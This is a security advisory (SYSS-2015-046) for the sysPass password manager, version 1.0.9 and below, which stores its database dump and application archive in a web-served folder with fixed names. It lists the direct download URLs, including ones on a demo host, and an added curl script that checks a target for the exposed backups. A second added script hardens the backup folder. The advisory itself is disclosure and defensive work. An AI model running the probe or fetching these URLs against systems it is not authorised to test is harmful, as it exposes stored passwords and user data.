sysPass 1.0.9 Insecure Direct Object Reference

Posted Dec 7, 2015
Authored by Daniele Salaris | Site syss.de

sysPass versions 1.0.9 and below allow for system backups to be downloaded by an external attacker.

tags | exploit
SHA-256 | 3f4f1197fb6b356561f3a5d4c13b670af0b0739a649d539b75953ebc8ae7b8d5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-046
Product: sysPass
Manufacturer: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: Insecure Direct Object References (CWE-932),
                    Exposure of Backup File to an Unauthorized Control
                    Sphere (CWE-530)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-06-10
Solution Date: 2015-10-26
Public Disclosure: 2015-12-07
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

sysPass is a web-based password manager written in PHP and Ajax with a
built-in multiuser environment.

The web application is prone to a security vulnerability that allows an
unauthenticated attacker to download existing backup files containing
sensitive data.

The software manufacturer describes the web application as follows
(see [1]):

"sysPass is a web password manager written in PHP that allows the
password management in a centralized way and in a multiuser environment.
The main features are:

* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The backup functionality of the web-based password manager sysPass
creates the following two backup files that are stored within the
application's backup folder:

* sysPass_db.sql
* sysPass.tar.gz

The file sysPass_db.sql contains a full database dump and the file
sysPass.tar.gz contains all contents of the sysPass web application
folder.

Because the backup folder sits inside the web root and the file names are
fixed, an unauthenticated attacker does not have to guess anything: both
files can be downloaded directly via the following URLs:

http(s)://<HOST>/backup/sysPass_db.sql
http(s)://<HOST>/backup/sysPass.tar.gz

Thus, an external attacker without valid user credentials gains access to
the complete database and to the application folder, including its
configuration files. With this data, an attacker can carry out further
attacks in order to recover the credentials of sysPass users or to decrypt
the encrypted password information stored in the database.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following URLs can be used to download existing backup files of the
password manager sysPass from an external attacker's perspective:

http(s)://<HOST>/backup/sysPass_db.sql
http(s)://<HOST>/backup/sysPass.tar.gz

For example:

http://syspass.org/demo/backup/sysPass_db.sql
http://syspass.org/demo/backup/sysPass.tar.gz
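
The same check, scripted. This is an added example, not part of the SySS
advisory or of the sysPass project: it requests the two backup URLs from
the Vulnerability Details and PoC sections without credentials and reports
whether what comes back is actually a dump or an archive rather than an
error page or a login form. The base-URL argument, the exit-code
convention and the body-prefix heuristics are assumptions of the script.

```sh
#!/bin/sh
# Added example, not part of the SySS advisory or the sysPass project:
# check whether a sysPass instance serves its backup files to an
# unauthenticated client, as described in SYSS-2015-046. Needs only curl
# and od. The "/backup/" path and the two file names come from the
# advisory; the body-signature heuristics below are this script's own
# assumptions, not something the advisory states.
#
# Usage: sh syspass_backup_check.sh https://host/path-to-sysPass
#        (the base URL is the directory that holds sysPass' index.php)

# Print the two backup URLs named in the advisory for a given base URL.
backup_urls() {
    base="${1%/}"                            # tolerate a trailing slash
    printf '%s/backup/sysPass_db.sql\n' "$base"
    printf '%s/backup/sysPass.tar.gz\n' "$base"
}

# Decide whether a response is a real backup rather than an error page or
# a login form. Arguments: HTTP status, the first bytes of the body as
# lower-case hex without separators, and the requested file name.
# Returns 0 (and prints EXPOSED) only when the body looks like the file.
# A bare 200 is not enough: many PHP apps answer 200 with a login page.
classify() {
    status="$1"; hex="$2"; name="$3"
    case "$status" in
        200|206) ;;                          # 206 when the Range request is honoured
        *) echo "not exposed (HTTP $status)"; return 1 ;;
    esac
    case "$name" in
        *.tar.gz)
            case "$hex" in
                1f8b*) echo "EXPOSED (gzip archive)"; return 0 ;;   # gzip magic bytes
            esac ;;
        *.sql)
            # Assumed dump prefixes: "--", "/*", SET, CREATE, DROP, INSERT
            case "$hex" in
                2d2d*|2f2a*|534554*|435245415445*|44524f50*|494e53455254*)
                    echo "EXPOSED (SQL dump)"; return 0 ;;
            esac ;;
    esac
    echo "not exposed (HTTP $status but body is not a backup)"
    return 1
}

# Fetch one URL without credentials and classify it. Only the first 16
# bytes are requested so a multi-megabyte dump is not pulled in full
# (servers that ignore Range send everything; od still reads 16 bytes).
probe() {
    url="$1"
    tmp=$(mktemp)
    status=$(curl -s -o "$tmp" -w '%{http_code}' -r 0-15 "$url" 2>/dev/null || true)
    status="${status:-000}"                  # no response at all
    hex=$(od -An -tx1 -N16 "$tmp" | tr -d ' \n')
    rm -f "$tmp"
    printf '%s: ' "$url"
    classify "$status" "$hex" "${url##*/}"
}

# With no argument only the functions are defined, so the file can be
# sourced. With a base URL, probe both files and exit 1 if either is exposed.
if [ "$#" -gt 0 ]; then
    exposed=0
    for u in $(backup_urls "$1"); do
        if probe "$u"; then exposed=1; fi
    done
    exit "$exposed"
fi
```

A plain HTTP 200 is deliberately not treated as proof of exposure, since
many PHP applications answer every path with a 200 login page; only the
gzip magic bytes or an SQL-looking prefix count. The script is also useful
as a regression check after patching: dumps written by the old version and
left in the folder would still show up here.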

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The reported security vulnerabilities have been fixed in a new software
release. Update to the new software version.
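
An interim measure for installations that cannot be upgraded straight
away, added here as an example and not the vendor's fix (the advisory does
not say what the fixed release changed): move the files the advisory names
out of the web-served backup/ folder and deny direct requests to that
path. The paths and the Apache/nginx directives are assumptions of the
example, not something the advisory specifies.

```sh
#!/bin/sh
# Added example, not the vendor's fix (the advisory does not describe what
# the fixed release changed): an interim hardening step for a sysPass
# install that cannot be upgraded immediately. It moves existing backup
# files out of the web-served backup/ folder into a directory outside the
# document root and blocks direct HTTP access to the legacy path on Apache.
#
# Usage: sh harden_syspass_backup.sh /var/www/sysPass /var/backups/syspass
#        (both paths are assumptions for this example; run it as the
#        account that owns the sysPass files)

harden_backup_dir() {
    webroot="$1"              # directory holding sysPass' index.php
    store="$2"                # destination outside the document root
    bdir="$webroot/backup"    # the path named in the advisory

    mkdir -p "$bdir" "$store"
    chmod 0700 "$store"       # readable by the owning account only

    # Move any existing dump or archive out of the web server's reach.
    # The patterns cover the two names in the advisory plus rotated copies.
    for f in "$bdir"/sysPass_db*.sql "$bdir"/sysPass*.tar.gz; do
        if [ -e "$f" ]; then
            mv "$f" "$store"/
        fi
    done

    # Refuse every request under /backup/. Apache 2.4 uses "Require",
    # 2.2 uses "Deny"; the IfModule pair keeps the file valid on both.
    # This only takes effect where AllowOverride permits AuthConfig/Limit
    # for the directory. nginx ignores .htaccess: there, put
    # "location ^~ /backup/ { deny all; }" in the server block instead.
    cat > "$bdir/.htaccess" <<'EOF'
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
EOF
}

# Run directly with the two paths; with no arguments only the function is
# defined, so the file can be sourced.
if [ "$#" -eq 2 ]; then
    harden_backup_dir "$1" "$2"
fi
```

The clean-up half is worth running after the upgrade as well: files the
vulnerable version already wrote to backup/ stay on disk, and the advisory
does not state whether the fixed release relocates or renames them. Verify
the deny rule afterwards by requesting the two URLs from the PoC without a
session; anything other than a 403 means the override is not in effect.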

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-06-08: Vulnerability discovered
2015-06-10: Vulnerability reported to manufacturer
2015-10-26: Release of new software version that addresses the reported
security issues. Discussed security fix with manufacturer.
2015-12-07: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Web site of sysPass - sysadmin password manager
http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-046
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-046.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Daniele Salaris of the SySS GmbH.

E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----